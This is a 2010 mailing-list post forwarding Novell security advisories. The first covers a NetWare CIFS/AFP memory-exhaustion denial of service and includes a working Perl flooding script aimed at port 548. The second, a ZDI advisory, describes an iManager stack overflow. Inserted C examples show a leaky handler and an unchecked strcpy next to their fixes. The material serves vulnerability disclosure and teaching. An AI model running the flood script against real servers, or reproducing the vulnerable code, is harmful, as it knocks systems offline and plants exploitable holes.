[guru] Novell security updates
DATE: Tue, 12 Jan 2010 18:27:10 +0100
The Novell Netware CIFS.NLM and AFPTCP.NLM modules contain memory leaks and
can be DoSed with suitably crafted requests.
The Novell iManager eDirectory schema import/export plugin contains a stack
buffer overflow bug.
--- Begin Message ---
#####################################################################################
Application: Novell Netware CIFS And AFP Remote Memory Consumption DoS
Platforms: Novell Netware 6.5 SP8
Crash: YES
Exploitation: Remote DoS
Date: 2009-12-21
Author: Francis Provencher (Protek Research Lab's)
Blog: http://protekresearch.blogspot.com/
#####################################################################################
1) Introduction
2) Report Timeline
3) Technical details
4) The Code
#####################################################################################
===============
1) Introduction
===============
Novell, Inc. is a global software and services company based in Waltham, Massachusetts. The company specializes in enterprise operating systems, such as SUSE Linux Enterprise and Novell NetWare; identity, security, and systems management solutions; and collaboration solutions, such as Novell Groupwise and Novell Pulse.
Novell was instrumental in making the Utah Valley a focus for technology and software development. Novell technology contributed to the emergence of local area networks, which displaced the dominant mainframe computing model and changed computing worldwide. Today, a primary focus of the company is on developing open source software for enterprise clients.
(http://en.wikipedia.org/wiki/Novell)
#####################################################################################
============================
2) Report Timeline
============================
2009-12-21 Vendor Contact
2009-12-22 Vendor Recontact
2009-12-29 Vendor Recontact
2010-01-05 Disclosure of this advisory
#####################################################################################
============================
3) Technical details
============================
CIFS.nlm Semantic Agent (Build 163 MP)
Version 3.27 November 13, 2008
AFPTCP.nlm Build 163 SP
Version 3.27 November 13, 2008
The CIFS and AFP protocols have a memory consumption problem when they receive lots of malformed arbitrary requests on their respective
services. Sending arbitrary crafted requests to these services will
consume all the memory available, create multiple abends and finally crash the whole server. It could take a couple of minutes to hours (depending on the memory available on the server).
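As an added illustration (not Novell's code and not part of the advisory) of how an allocation that is never released on the malformed-request path turns into the memory exhaustion described above. The wire format, the slot table, its size and the function names are all constructed for the demo; a real server would be leaking heap memory instead of table entries.

```c
#include <stdint.h>
#include <string.h>
/* Hypothetical request handler, not Novell's CIFS/AFP code. Per-request
 * state comes from a small fixed table so exhaustion is visible in a test;
 * a real server would be leaking heap memory instead. */
#define SLOTS    8
#define MAX_BODY 512
struct request { int in_use; size_t len; uint8_t body[MAX_BODY]; };
static struct request table[SLOTS];

static struct request *acquire(void) {
    for (int i = 0; i < SLOTS; i++)
        if (!table[i].in_use) { table[i].in_use = 1; return &table[i]; }
    return NULL;                                 /* out of request memory */
}
static void release(struct request *r) { r->in_use = 0; }
int slots_in_use(void) {
    int n = 0;
    for (int i = 0; i < SLOTS; i++) n += table[i].in_use;
    return n;
}

/* Constructed wire format: 'N','W', 16-bit big-endian body length, body. */
static int header_ok(const uint8_t *buf, size_t n, size_t *len) {
    if (n < 4 || buf[0] != 'N' || buf[1] != 'W') return 0;
    *len = ((size_t)buf[2] << 8) | buf[3];
    return *len == n - 4 && *len <= MAX_BODY;
}

/* Leaky version: state is acquired before validation and never released on
 * the malformed-request path. Returns 0 ok, -1 malformed, -2 no memory. */
int handle_leaky(const uint8_t *buf, size_t n) {
    struct request *r = acquire();
    if (!r) return -2;
    if (!header_ok(buf, n, &r->len)) return -1;  /* r stays in_use forever */
    memcpy(r->body, buf + 4, r->len);
    release(r);                                  /* ... after dispatch */
    return 0;
}

/* Fixed version: validate first, then acquire, and release on every path. */
int handle_fixed(const uint8_t *buf, size_t n) {
    size_t len;
    if (!header_ok(buf, n, &len)) return -1;     /* nothing acquired yet */
    struct request *r = acquire();
    if (!r) return -2;
    r->len = len;
    memcpy(r->body, buf + 4, len);
    release(r);
    return 0;
}
```

After SLOTS malformed requests the leaky handler denies even a well-formed one, which is the denial of service in miniature.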
#####################################################################################
===========
4) The Code
===========
#!/usr/bin/perl
# Found by Francis Provencher for Protek Research Lab's
# {PRL} Novell Netware CIFS.nlm Remote Memory Consumption Denial of Service
# Here is a modified version from the script written by the researcher Jeremy Brown
# http://jbrownsec.blogspot.com/2009/12/writing-code-that-breaks-code.html
#
use IO::Socket;
use String::Random;

$target   = $ARGV[0];
$port     = 548;      # AFP over TCP
$protocol = 'tcp';
$maxsize  = 666;      # upper bound on the random payload length
$random   = 0;

if ((!defined($target) || !defined($port) || !defined($protocol) || !defined($maxsize)))
{
    print "usage: $0 <target> \n";
    exit;
}

# Called when the connection attempt fails.
sub logit
{
    print "connection to $target:$port failed: $!\n";
    exit;
}

while (1)
{
    $sock = IO::Socket::INET->new(Proto => $protocol, PeerHost => $target, PeerPort => $port)
        or logit();
    # build a random payload of random length (up to $maxsize) and send it
    $rand   = new String::Random;
    $random = $rand->randpattern("." x rand($maxsize)) . "\r\n\r\n";
    $sock->send($random);
    close($sock);
}
#####################################################################################
(PRL-2009-27)
--- End Message ---
--- Begin Message ---
ZDI-10-001: Novell iManager eDirectory Plugin Remote Code Execution Vulnerability
http://www.zerodayinitiative.com/advisories/ZDI-10-001
January 7, 2010
-- CVE ID:
CVE-2009-4486
-- Affected Vendors:
Novell
-- Affected Products:
Novell iManager
-- Vulnerability Details:
This vulnerability allows attackers to execute arbitrary code on
vulnerable installations of Novell iManager. Authentication is not
required to exploit this vulnerability.
The flaw exists in an application called by the iManager in order to
handle importing/exporting of schema information. While
importing/exporting from the schema, the sub-application fails to
validate the length of its arguments while copying user-supplied data
into a statically allocated stack buffer. This can result in code
execution under the privileges of the application.
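An added sketch of the flaw class the advisory describes, not iManager's code: the buffer, its size NAME_MAX and the function names are assumed, since the advisory does not name the real ones. The unchecked copy is shown beside a length-validated version.

```c
#include <string.h>

/* Hypothetical sketch of the bug class, not iManager's code: a helper
 * invoked with user-supplied schema arguments copies one of them into a
 * fixed-size stack buffer. The real buffer and argument are not described
 * in the advisory; NAME_MAX is an assumed size. */
#define NAME_MAX 64

/* Vulnerable pattern: strcpy trusts the argument's length, so any argument
 * of NAME_MAX bytes or more overruns the stack buffer (undefined behaviour). */
int import_schema_vuln(const char *arg) {
    char name[NAME_MAX];
    strcpy(name, arg);                  /* unbounded copy: the defect */
    return (int)strlen(name);
}

/* Hardened version: measure with a bound, refuse anything that would not
 * fit with its terminator, then copy. Returns the length or -1 on rejection. */
int import_schema_safe(const char *arg) {
    char name[NAME_MAX];
    if (arg == NULL) return -1;
    size_t n = 0;
    while (n < NAME_MAX && arg[n] != '\0') n++;   /* never reads past NAME_MAX */
    if (n >= NAME_MAX) return -1;                 /* no room for the NUL */
    memcpy(name, arg, n + 1);
    return (int)n;
}
```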
-- Vendor Response:
Novell has issued an update to correct this vulnerability. More
details can be found at:
http://www.novell.com/support/viewContent.do?externalId=7004985&sliceId=1
-- Disclosure Timeline:
2009-03-26 - Vulnerability reported to vendor
2010-01-07 - Coordinated public release of advisory
-- Credit:
This vulnerability was discovered by:
* 1c239c43f521145fa8385d64a9c32243
-- About the Zero Day Initiative (ZDI):
Established by TippingPoint, The Zero Day Initiative (ZDI) represents
a best-of-breed model for rewarding security researchers for responsibly
disclosing discovered vulnerabilities.
Researchers interested in getting paid for their security research
through the ZDI can find more information and sign-up at:
http://www.zerodayinitiative.com
The ZDI is unique in how the acquired vulnerability information is
used. TippingPoint does not re-sell the vulnerability details or any
exploit code. Instead, upon notifying the affected product vendor,
TippingPoint provides its customers with zero day protection through
its intrusion prevention technology. Explicit details regarding the
specifics of the vulnerability are not exposed to any parties until
an official vendor patch is publicly available. Furthermore, with the
altruistic aim of helping to secure a broader user base, TippingPoint
provides this vulnerability information confidentially to security
vendors (including competitors) who have a vulnerability protection or
mitigation product.
Our vulnerability disclosure policy is available online at:
http://www.zerodayinitiative.com/advisories/disclosure_policy/
--- End Message ---